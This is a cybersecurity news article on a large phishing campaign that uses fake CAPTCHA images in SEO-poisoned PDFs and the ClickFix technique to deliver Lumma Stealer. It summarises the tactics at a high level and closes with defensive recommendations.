Massive Phishing Campaign Uses Fake CAPTCHAs to Spread Lumma Stealer Malware
Cybercriminals are stepping up their game with a new large-scale phishing campaign that delivers the Lumma Stealer malware through fake CAPTCHA images embedded in PDF files. According to Netskope Threat Labs, this campaign has already compromised over 7,000 users across 1,150 organizations, mainly targeting the technology, financial services, and manufacturing sectors in North America, Asia, and Southern Europe.
Researchers found 5,000 malicious PDFs hosted on 260 different domains, many of which belong to Webflow, GoDaddy, Strikingly, Wix, and Fastly. The attackers use SEO manipulation to trick victims into clicking on these documents from search engine results, ultimately redirecting them to sites designed to either steal credit card details or infect their systems with Lumma Stealer malware.
Table of Contents
How the Attack Works
The attackers distribute PDF files that contain fake CAPTCHA images. Victims who click on these CAPTCHAs are redirected to malicious websites where they are either tricked into entering sensitive financial details or are infected with malware through a PowerShell-based attack.
The Lumma Stealer variant in this campaign is deployed through a ClickFix technique, which tricks users into executing an MSHTA command. This command runs a hidden PowerShell script that downloads and installs the Lumma Stealer malware onto the victim’s system.
Key Tactics Used in This Campaign
- Search Engine Optimization (SEO) Poisoning – Malicious PDFs are uploaded to online libraries and repositories like PDFCOFFEE, PDF4PRO, PDFBean, and Internet Archive, making them appear in legitimate search results.
- Fake CAPTCHA Verification – Victims who attempt to "verify" themselves by clicking the CAPTCHA unknowingly execute malicious commands.
- MSHTA and PowerShell Exploits – The attack bypasses security defenses using trusted Windows utilities to run malware.
- Widespread Hosting Infrastructure – The phishing PDFs are spread across hundreds of domains, making takedown efforts more challenging.
Lumma Stealer: A Dangerous Infostealer on the Rise
Lumma Stealer is a Malware-as-a-Service (MaaS) tool designed to harvest sensitive data from compromised Windows machines. It can steal login credentials, browser cookies, crypto wallets, and other valuable information.
Recently, Lumma operators expanded its capabilities by integrating with GhostSocks, a Golang-based proxy malware. This allows threat actors to leverage victims’ internet connections to bypass geographic restrictions and evade financial security measures that detect unauthorized access.
Stolen credentials and data from Lumma infections are frequently shared on underground forums like Leaky[.]pro, a relatively new hacking marketplace that emerged in late December 2024.
Other Threats Leveraging the ClickFix Technique
Lumma Stealer isn’t the only malware exploiting ClickFix phishing techniques. Researchers from Zscaler ThreatLabz and eSentire have observed similar tactics used to distribute:
- Vidar Stealer
- Atomic macOS Stealer (AMOS)
- DeepSeek AI Chatbot-themed malware
Additionally, Juniper Threat Labs has spotted phishing attacks using Unicode obfuscation methods to evade detection. These attacks hide binary values within Hangul characters (U+FFA0 and U+3164), making malicious JavaScript payloads harder for security tools to detect.
How to Protect Yourself from Lumma Stealer and Similar Attacks
Given the sophistication and scale of this campaign, organizations and individuals should take immediate action to enhance their cybersecurity defenses.
- Avoid Clicking on Suspicious PDF Links – Be cautious when downloading PDFs from search results, email attachments, or unknown sources.
- Verify CAPTCHA Pages – Legitimate CAPTCHAs do not require downloading files or running scripts.
- Monitor Webflow and Other Hosting Services – Security teams should track malicious use of their domains and report suspicious content.
- Restrict PowerShell and MSHTA Execution – Implement Group Policy restrictions to prevent attackers from abusing Windows tools to run malicious code.
- Educate Employees on Phishing Techniques – Train staff to recognize fake CAPTCHAs, SEO-based phishing, and other social engineering tactics.
- Deploy Advanced Threat Protection – Use endpoint detection and response (EDR) solutions to detect PowerShell abuse, suspicious web traffic, and infostealer malware activity.
Final Thoughts
This phishing campaign highlights how cybercriminals are evolving their techniques to distribute Lumma Stealer and other malware. By using fake CAPTCHAs in PDFs, SEO poisoning, and advanced obfuscation methods, attackers are successfully bypassing traditional security measures.
With thousands of users already compromised and malware distribution tactics expanding, businesses must stay vigilant, educate employees, and implement strong security measures to defend against these evolving threats.
